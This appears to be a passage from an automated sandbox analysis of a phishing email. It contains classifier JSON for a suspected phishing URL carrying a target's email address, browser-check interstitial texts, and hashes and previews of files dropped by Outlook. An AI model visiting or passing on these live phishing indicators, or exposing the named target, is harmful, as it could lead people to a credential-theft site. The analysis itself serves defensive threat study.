  "prominent_button_name": "Listen Now",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": true,
  "has_visible_qrcode": false
}
                                                                URL: Email Model: Joe Sandbox AI
                                                                ```json
{
  "brands": [
    "Generous Minds"
  ]
}
                                                                URL: https://mrwa.ungonditc.com/aIEqPG/#Dkelly.swanson@montrose-env.com Model: Joe Sandbox AI
                                                                ```json
{
  "contains_trigger_text": true,
  "trigger_text": "Confirming your browser to ensure a secure browsing experience.",
  "prominent_button_name": "unknown",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false
}
                                                                URL: http://condominioanacarolina.com.br Model: Joe Sandbox AI
                                                                {
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": false,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": false,
    "brand_spoofing_attempt": false,
    "third_party_hosting": false
}
                                                                URL: http://condominioanacarolina.com.br
                                                                URL: https://mrwa.ungonditc.com/aIEqPG/#Dkelly.swanson@montrose-env.com Model: Joe Sandbox AI
                                                                ```json
{
  "contains_trigger_text": true,
  "trigger_text": "Confirming your browser to ensure a secure browsing experience.",
  "prominent_button_name": "unknown",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": true,
  "has_urgent_text": false,
  "has_visible_qrcode": false
}
                                                                URL: https://mrwa.ungonditc.com/aIEqPG/#Dkelly.swanson@montrose-env.com Model: Joe Sandbox AI
                                                                ```json
{
  "brands": []
}
                                                                URL: https://mrwa.ungonditc.com/aIEqPG/#Dkelly.swanson@montrose-env.com Model: Joe Sandbox AI
                                                                ```json
{
  "contains_trigger_text": true,
  "trigger_text": "Confirming your browser to ensure a secure browsing experience.",
  "prominent_button_name": "unknown",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false
}
                                                                URL: https://mrwa.ungonditc.com/aIEqPG/#Dkelly.swanson@montrose-env.com Model: Joe Sandbox AI
                                                                ```json
{
  "brands": [
    "Cloudflare"
  ]
}
                                                                URL: https://mrwa.ungonditc.com/aIEqPG/#Dkelly.swanson@montrose-env.com Model: Joe Sandbox AI
                                                                ```json
{
  "brands": [
    "Cloudflare"
  ]
}
                                                                URL: https://mrwa.ungonditc.com/aIEqPG/#Dkelly.swanson@montrose-env.com Model: Joe Sandbox AI
                                                                ```json
{
  "contains_trigger_text": true,
  "trigger_text": "Ensuring your safety by conducting browser checks.",
  "prominent_button_name": "unknown",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false
}
                                                                URL: https://mrwa.ungonditc.com/aIEqPG/#Dkelly.swanson@montrose-env.com Model: Joe Sandbox AI
                                                                ```json
{
  "contains_trigger_text": true,
  "trigger_text": "Ensuring your safety by conducting browser checks.",
  "prominent_button_name": "unknown",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false
}
                                                                URL: https://mrwa.ungonditc.com/aIEqPG/#Dkelly.swanson@montrose-env.com Model: Joe Sandbox AI
                                                                ```json
{
  "brands": []
}
                                                                URL: https://mrwa.ungonditc.com/aIEqPG/#Dkelly.swanson@montrose-env.com Model: Joe Sandbox AI
                                                                ```json
{
  "brands": [
    "Cloudflare"
  ]
}
                                                                URL: https://login.microsoftonline.com Model: Joe Sandbox AI
                                                                {
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": false,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": true,
    "brand_spoofing_attempt": false,
    "third_party_hosting": false
}
                                                                URL: https://login.microsoftonline.com
                                                                URL: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2 Model: Joe Sandbox AI
                                                                ```json
{
  "contains_trigger_text": true,
  "trigger_text": "Sign in",
  "prominent_button_name": "Next",
  "text_input_field_labels": [
    "Email, phone, or Skype",
    "No account? Create one!",
    "Can't access your account?"
  ],
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false
}
                                                                URL: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2 Model: Joe Sandbox AI
                                                                ```json
{
  "brands": [
    "Microsoft"
  ]
}
                                                                URL: https://mrwa.ungonditc.com/aIEqPG/#Dkelly.swanson@montrose-env.com Model: Joe Sandbox AI
                                                                ```json
{
  "contains_trigger_text": true,
  "trigger_text": "Conducting security checks to protect your browser.",
  "prominent_button_name": "unknown",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false
}
                                                                URL: https://mrwa.ungonditc.com/aIEqPG/#Dkelly.swanson@montrose-env.com Model: Joe Sandbox AI
                                                                ```json
{
  "brands": [
    "Cloudflare"
  ]
}
                                                                URL: https://mrwa.ungonditc.com/aIEqPG/#Dkelly.swanson@montrose-env.com Model: Joe Sandbox AI
                                                                ```json
{
  "contains_trigger_text": true,
  "trigger_text": "Conducting security checks to protect your browser.",
  "prominent_button_name": "unknown",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false
}
                                                                URL: https://mrwa.ungonditc.com/aIEqPG/#Dkelly.swanson@montrose-env.com Model: Joe Sandbox AI
                                                                ```json
{
  "brands": [
    "Cloudflare"
  ]
}
                                                                URL: https://microsoft.com Model: Joe Sandbox AI
                                                                {
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": false,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": true,
    "brand_spoofing_attempt": false,
    "third_party_hosting": false
}
                                                                URL: https://microsoft.com
                                                                URL: https://www.microsoft.com/en-us/microsoft-365/outlook/email-and-calendar-software-microsoft-outlook?deeplink=%2fowa%2f&sdf=0 Model: Joe Sandbox AI
                                                                ```json
{
  "contains_trigger_text": true,
  "trigger_text": "Your current User-Agent string appears to be from an automated process, if this is incorrect, please click this link:",
  "prominent_button_name": "United States English Microsoft Homepage",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": true,
  "has_visible_qrcode": false
}
                                                                URL: https://www.microsoft.com Model: Joe Sandbox AI
                                                                {
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": false,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": true,
    "brand_spoofing_attempt": false,
    "third_party_hosting": false
}
                                                                URL: https://www.microsoft.com
                                                                URL: https://www.microsoft.com/en-us/microsoft-365/outlook/email-and-calendar-software-microsoft-outlook?deeplink=%2fowa%2f&sdf=0 Model: Joe Sandbox AI
                                                                ```json
{
  "brands": [
    "Microsoft"
  ]
}

                                                                Created / dropped Files

                                                                C:\Users\user\AppData\Local\Microsoft\FORMS\FRMCACHE.DAT

                                                                Download File
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:data
                                                                Category:modified
                                                                Size (bytes):231348
                                                                Entropy (8bit):4.391437478040974
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:3DCCDC55441FE397F24BD462F1857611
                                                                SHA1:8149C25B58ECF9F8FF9B546AB1D25B06704AE3D2
                                                                SHA-256:099E51D16FE97EED148C57BB8B268BD91528451AD503D912814FF7302A3F39CC
                                                                SHA-512:F72AC93D8FDB24DB95A02CFE68253D36A254AD9FDF41B52D3E019C215E09428A51D081D6A1A0A516E95B3245C4320C8D750E97B3F88B6FC87CA8EA3585C92630
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:TH02...... ..h...7......SM01X...,........7..........IPM.Activity...........h...............h............H..h...............h...........H..h\cal ...pDat...h@...0...`......hW.............h........_`Pk...h...@...I.lw...h....H...8.Uk...0....T...............d.........2h...............k..............!h.............. h...G....x.....#h....8.........$h.......8....."h@9.......9....'h..^...........1hW..<.........0h....4....Uk../h....h.....UkH..h`b..p.........-h .............+h........................... ..............F7..............FIPM.Activity....Form....Standard....Journal Entry...IPM.Microsoft.FolderDesign.FormsDescription................F.k..........1122110020000000....Microsoft...This form is used to create journal entries.........kf...... ..........&...........(.......(... ...@.....................................................................................................................fffffffff........wwwwwwww.p....pp..............p...............pw..............pw..DDDDO..

                                                                C:\Users\user\AppData\Local\Microsoft\Office\16.0\AddInClassifierCache\OfficeSharedEntities.bin

                                                                Download File
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):322260
                                                                Entropy (8bit):4.000299760592446
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:CC90D669144261B198DEAD45AA266572
                                                                SHA1:EF164048A8BC8BD3A015CF63E78BDAC720071305
                                                                SHA-256:89C701EEFF939A44F28921FD85365ECD87041935DCD0FE0BAF04957DA12C9899
                                                                SHA-512:16F8A8A6DCBAEAEFB88C7CFF910BCCC71B76A723CF808B810F500E28E543112C2FAE2491D4D209569BD810490EDFF564A2B084709B02963BCAF6FDF1AEEC59AC
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:51253fe60063c31af0d295afb42228b0:v2:2:1:1590:2:8479:76bd602437550e98c9043d06a55186ab7d95dea5a0e935a599f73e62a8c9b158e0afcb19351f6c353940c06a38172b94d18c02cf92bb8a80184eccca0392b259ab3e71dae73e491c7941997cb36ad4a198661f622dad478d840f66d530a0dde78acea3367f91fff62fbb3dc18faff0c708ad30edef5bea8b22c5fd782b770d8993386eaa784fd19a3c3e1db3b537b1a94d3d4fbd46f8df8fddf6d16611969fe0a97c50e0f3ac24750c93257cf5c161184aa7385800c87d803b339632a3d8ec7fe17a0afd83ce9e9d0e3f7b8d579637928a811f1f7e6d1887df2ddc7d4f752c4d600235e426c92c7bf8a1362f95457998cc0e5d4261f0efa4fada0f866dbcefb407dacab7a2914e91c2f08200f38c2d9d621962145b1464b0f204b326118a53ecdcab22bff005fdd5257c99a6dc51ac0600a49f2ef782396987e78c08b846dad5db55e8ccefffc64863bc2c3e90b95a09d25d0814a848c98fe01a82d4e30e6682dd546e12c45ca0d280a45295ab4bd632dafb070edfdc3c9e38313d5aeb195972986f8011b66817028fd8c78b67a0ac7e780eecc3fb6a31f5a025b8a9a3db278a98c0696aeaac739b18688b0f9c7d751bba02cc5f4e41853fb119b3c0c915059aaa92971244a1989124f12881ca88e6410df70b793a2c3a736ff4

                                                                C:\Users\user\AppData\Local\Microsoft\Office\16.0\AddInClassifierCache\OfficeSharedEntitiesUpdated.bin

                                                                Download File
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:ASCII text, with no line terminators
                                                                Category:modified
                                                                Size (bytes):10
                                                                Entropy (8bit):2.4464393446710155
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:23CDD3C2BF36F44AC865D5C2EC815FC3
                                                                SHA1:F93B54AC79770F6E9B8883C1F966852A4711A69C
                                                                SHA-256:FA007B3E07C5849DC82745D45A783C1A88DC69FB6CB8DD01FB4764887A23B455
                                                                SHA-512:49127BE20B1479360BC2365BCD4BEB6855DD2FA92513728C9A5F2CA9050B749ADADEF59FE8B25CF32D0F9186DADF28BFEEBC09F5B97AFFEF311E7B3BC09DE7BE
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:1731701545

                                                                C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\7FE24FCC-E5E6-49E3-BC4A-4943CEFAF418

                                                                Download File
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):180288
                                                                Entropy (8bit):5.290980264446109
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:AADFA375FC5939560C91A6EBB406292A
                                                                SHA1:748C49323533EE0E9A4285E053129E36D3B9A79D
                                                                SHA-256:201384849706848666E4B07E754BEEC23CF82B7F58E8A7AC75E1E535F96F7E20
                                                                SHA-512:2AE23B97C94A7BDA65AA996744AF557B26F325A5658944EBD633173972E2519E0AC608CD446C33D2AE26F090E654F244D82C1DA215D9F20EB4D94A2E00A9CB93
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2024-11-15T20:12:21">.. Build: 16.0.18223.40125-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://word-edit.officeapps.live.com/we/rrdiscovery.ashx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. <o:ticket o:policy="MBI_SSL_SHORT" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Passport1.4 from-PP='{}&amp;p='" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[

                                                                C:\Users\user\AppData\Local\Microsoft\Office\OTele\outlook.exe.db

                                                                Download File
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:SQLite 3.x database, last written using SQLite version 3023002, writer version 2, read version 2, file counter 2, database pages 1, cookie 0, schema 0, largest root page 1, unknown 0 encoding, version-valid-for 2
                                                                Category:dropped
                                                                Size (bytes):4096
                                                                Entropy (8bit):0.09216609452072291
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:F138A66469C10D5761C6CBB36F2163C3
                                                                SHA1:EEA136206474280549586923B7A4A3C6D5DB1E25
                                                                SHA-256:C712D6C7A60F170A0C6C5EC768D962C58B1F59A2D417E98C7C528A037C427AB6
                                                                SHA-512:9D25F943B6137DD2981EE75D57BAF3A9E0EE27EEA2DF19591D580F02EC8520D837B8E419A8B1EB7197614A3C6D8793C56EBC848C38295ADA23C31273DAA302D9
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:SQLite format 3......@ .......................................................................... .....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Microsoft\Office\OTele\outlook.exe.db-journal

                                                                Download File
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:SQLite Rollback Journal
                                                                Category:dropped
                                                                Size (bytes):4616
                                                                Entropy (8bit):0.13760166725504608
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:A8709B9197F5C93A2DED9AA5A8EC9FA2
                                                                SHA1:89AA23DA38F7DDF96D84C4A8F39EAB7EBB84AE21
                                                                SHA-256:AD11D285461A4BE2E4C06265032BC6B4C365EBD9AFF8C7A3C623BC255A26CD75
                                                                SHA-512:1254B6702FB4EA58CCAA12C88C4D04A76F0B2CCF6463306858F402C9A85F981567209C5FE928DC6B36AE240D5E9BE40B3D295443ACBEB863833478200B802EEF
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:.... .c......;.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................SQLite format 3......@ .......................................................................... .................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Microsoft\Office\OTele\outlook.exe.db-shm

                                                                Download File
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):32768
                                                                Entropy (8bit):0.04449651975591713
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:7A8DF2A8DDAC9FC5538F2C436DFD07BD
                                                                SHA1:333957C55A1061F324D8AEED1D0DD985DE78A1FA
                                                                SHA-256:6A76748184F88BBBF28CD953817B14938BCB851E2EDE139B4C5E54954CF1D5BE
                                                                SHA-512:8801049356CD4AC599FFFE5FBDE65A51C02AA49CF5B5A314C32A8E4786D1A0AD8CDC3ED4210D95C40558D9C2B715EFF85CB83781725A158D2BBEACF8B6426661
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:..-.....................7..n,....-..]..l...7.)..-.....................7..n,....-..]..l...7.)........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Microsoft\Office\OTele\outlook.exe.db-wal

                                                                Download File
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:SQLite Write-Ahead Log, version 3007000
                                                                Category:dropped
                                                                Size (bytes):45352
                                                                Entropy (8bit):0.39459034819233635
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:B8593D356F7726E6A4EBC23A41A7FEF8
                                                                SHA1:9171F47AD8BDA28860980F03DD6E7C6756A5656F
                                                                SHA-256:7AF38E837660ED60E99DC8907D730D1F2B4630E52875CD5152D729F525B003A2
                                                                SHA-512:1E55425B56FB257FEB1B06DF6C514634145F763E4A3460659CC63715ECAE4E596F1C25004A1D9AE5BF895A728E684F80F26C06645F491CD697F5C1D1D1A1835B
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:7....-...........-..]....00l.ee.........-..]....m...g.SQLite format 3......@ .......................................................................... .............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\DC1E33CE.dat

                                                                Download File
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:PNG image data, 1120 x 540, 8-bit/color RGBA, non-interlaced
                                                                Category:dropped
                                                                Size (bytes):82368
                                                                Entropy (8bit):7.8980673829519885
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:CD30258B77CF3300C43D7984FC667976
                                                                SHA1:FBF893AE35B7CA03C82F70D665515D962C5321A4
                                                                SHA-256:344938F2E50CE50316A1400FD8965085DD859889721D47756645E6CA532E895D
                                                                SHA-512:C6FE276EA27BC51F06A055C2F53B8921C30A411796069B91E24C5C0624408749423787A2C441D4D4F1709604CDB166C3044BF5296CAD8A3E67DF6365FF7BD8B7
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:.PNG........IHDR...`..........>.)....iCCPICC Profile..H....TS....{.CBK......@J.-.A:.JH...b ...q.W......"..J.EDD.-.J........*........s..w'..........,...R`y.R...`owzdT4.7..@......p.E. .....|....g:.........s......sS.>..K.H.......Y.!..6..b.A...8a.G.8n..`:&4..0..<...'.@.#~z&7..CrC.B.....!...C...H..#M.g..%O..r.Isr8.R....=.......8....Hfk.#JJ...#V.9...4?)......7.?....Y..g....MY.?.../.4O.;t...!.,N...........$.I..|.4.Vbh.,g....rzr..\.K..K......su..{OM..~.l...P...9s.......x|...0i.(.]ZK..$..xK..!....9.6Hz.I..Y.,..R...:.G.<......+M.Z,HH.3.....\..t+.+.........6}.!..9_.....&''..|..y....8:.3.......-\.8s.7}.0............).B........ ...(..pA"HE:_..M ..`.(....p...gA=h...5p........C........A8..Q .H..L +...@..?..EA.P.$.$.Zh3...B..a......].n@...h....B_`.L...:...........R8.^.g.9......O.u.e.......q.@.h(-.)..b..Q.x......*FU..Q..v.=T?j....ES.t.)....Cs.+........:t...z.=...!c.0&.G....I....b.1.0....n.......a...X.l.6.......[.m.vb...8.N.g.s...8..\.n.......7.....k..^.h..

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{0BF5F41C-A174-4C0A-A5F7-35A791FAE1D2}.tmp

                                                                Download File
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):10716
                                                                Entropy (8bit):3.6527240776470755
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:E68A3C8689F81B57D4AF7537BB38BE5C
                                                                SHA1:CE22CA4E70DEF93DB6EF6C0E78B5D23B7FBF1D26
                                                                SHA-256:3BE7F3B5E06B480E6ED05A9835E54D8A5A8EA70EF3B62A22817A6A9FD5D60A63
                                                                SHA-512:53DBE687EC633DFA8E9F2CF3CCB777DF61F13FA2107A7C87C0F7301C3BDA02B8D5D193CE13DB7AC747A49D1233EFD130923FBD04C29A4CA499642B66431A6381
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:......Y.o.u. .d.o.n.'.t. .o.f.t.e.n. .g.e.t. .e.m.a.i.l. .f.r.o.m. .r.b.e.u.k.@.g.e.n.e.r.o.u.s.-.m.i.n.d.s...c.o.m... .H.Y.P.E.R.L.I.N.K. .".h.t.t.p.s.:././.a.k.a...m.s./.L.e.a.r.n.A.b.o.u.t.S.e.n.d.e.r.I.d.e.n.t.i.f.i.c.a.t.i.o.n."............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................$.a$.*...$..$.If........!v..h.#v....:V.......t.....6......5.......4

                                                                C:\Users\user\AppData\Local\Temp\Diagnostics\OUTLOOK\App1731701539002280800_724FEF67-A747-4055-BD35-B5E373A6D3A2.log

                                                                Download File
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:ASCII text, with very long lines (859), with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):20971520
                                                                Entropy (8bit):0.007811362792378627
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:8261F74991F01BB8F8AB92E02CA8B730
                                                                SHA1:E14FE656A160D04C34CE1AA9516E19F2F81BD1A7
                                                                SHA-256:7B117EB9D1D2C72D0A75AB9FEEF279A132E861352451257961AAA8237B4D2903
                                                                SHA-512:C60D2731FA548A5DB1E7311A64D7122C77F1E221C36925A5B4879AB3C73252D25552AD9D48733F826580AD426751D504900E6B1C8AE8A854818D73926496DCA1
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..11/15/2024 20:12:19.053.OUTLOOK (0x191C).0x1B08.Microsoft Outlook.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.LoadXmlRules","Flags":33777014401990913,"InternalSequenceNumber":21,"Time":"2024-11-15T20:12:19.053Z","Contract":"Office.System.Activity","Activity.CV":"Z+9PckenVUC9NbXjc6bTog.10.1","Activity.Duration":143,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Activity.Result.Code":-2147024890,"Activity.Result.Type":"HRESULT","Activity.Result.Tag":528307459}...11/15/2024 20:12:19.053.OUTLOOK (0x191C).0x1B08.Microsoft Outlook.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.ProcessIdleQueueJob","Flags":33777014401990913,"InternalSequenceNumber":22,"Time":"2024-11-15T20:12:19.053Z","Contract":"Office.System.Activity","Activity.CV":"Z+9PckenVUC9NbXjc6bTog.10","Activity.Duration":463,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Data.F

                                                                C:\Users\user\AppData\Local\Temp\Diagnostics\OUTLOOK\App1731701539002968000_724FEF67-A747-4055-BD35-B5E373A6D3A2.log

                                                                Download File
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):20971520
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                                                                SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                                                                SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                                                                SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20241115T1512180845-6428.etl

                                                                Download File
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:data
                                                                Category:modified
                                                                Size (bytes):131072
                                                                Entropy (8bit):4.701201381242015
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:C57C75799E87B023A6B9210D9D3772FA
                                                                SHA1:5743BC1B2ADC67A8BD5A5E4C7CCA758193B02004
                                                                SHA-256:368A46C774ED960F6C0E5FAD7AB8BFC1BF438FB134816441CF0B00D4357D4DD0
                                                                SHA-512:8613F836993E5D215F0197337392647D7A5D644FA786D16CB3F681E3CA75A66711BED6AFCB0D26192E436832ABA3869571CD80F71925B27A9715F0EB43DB6AE7
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:............................................................................`................7..................eJ..............Zb..2...................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1...........................................................P.|..Y...............7..........v.2._.O.U.T.L.O.O.K.:.1.9.1.c.:.6.6.f.3.3.6.a.d.d.8.4.e.4.a.0.5.b.1.2.6.a.3.2.a.7.f.4.e.8.f.6.6...C.:.\.U.s.e.r.s.\.c.a.l.i.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.O.u.t.l.o.o.k. .L.o.g.g.i.n.g.\.O.U.T.L.O.O.K._.1.6._.0._.1.6.8.2.7._.2.0.1.3.0.-.2.0.2.4.1.1.1.5.T.1.5.1.2.1.8.0.8.4.5.-.6.4.2.8...e.t.l.......P.P..............7..........................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\MSO3072.acl

                                                                Download File
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):30
                                                                Entropy (8bit):1.2389205950315936
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:53CFA05FD097456CE7D5FAF7CE8AD83C
                                                                SHA1:902A3A05FA3FBD9F83C904ACB05870E72E9BBB16
                                                                SHA-256:81F6BE4FF986B0D09569365472B22CA5F8EC301455E3B6D72471CA7F62C78F4B
                                                                SHA-512:645E7ED9B1CB2F4595ACC7EF19585B42D6C85390017F3B8E3F7D542853B0BC055A72866A684DAF006E351C82838477336052C3E2F0A24D69A8A21CECDF5A4934
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:....F.........................

                                                                C:\Users\user\AppData\Roaming\Microsoft\Outlook\NoEmail.srs

                                                                Download File
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                Category:dropped
                                                                Size (bytes):16384
                                                                Entropy (8bit):0.6697884749581648
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:D86A30DF902425F03B8BCEB9EA0F32DE
                                                                SHA1:63A85A38F963073D3198B2A7917CC0227268D9FD
                                                                SHA-256:EC59E969B08DC7F6B3A7C2CEF919A71A331D06404D846F5AFE2FA8314F62742D
                                                                SHA-512:D40CEA41B01BA780B070D845BB3177DE3EFBCCFE5082B0BB4F6385126D38F904B42CC0B9AE04920D34B33A4A145D3A889F299B1B39B86514B8328A920E812CB8
                                                                Malicious:true
                                                                Reputation:unknown
                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                                                                Download File
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Nov 15 19:12:33 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                Category:dropped
                                                                Size (bytes):2673
                                                                Entropy (8bit):3.9838745898457644
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:4A54892C3A6BC0D77B45312B0699193A
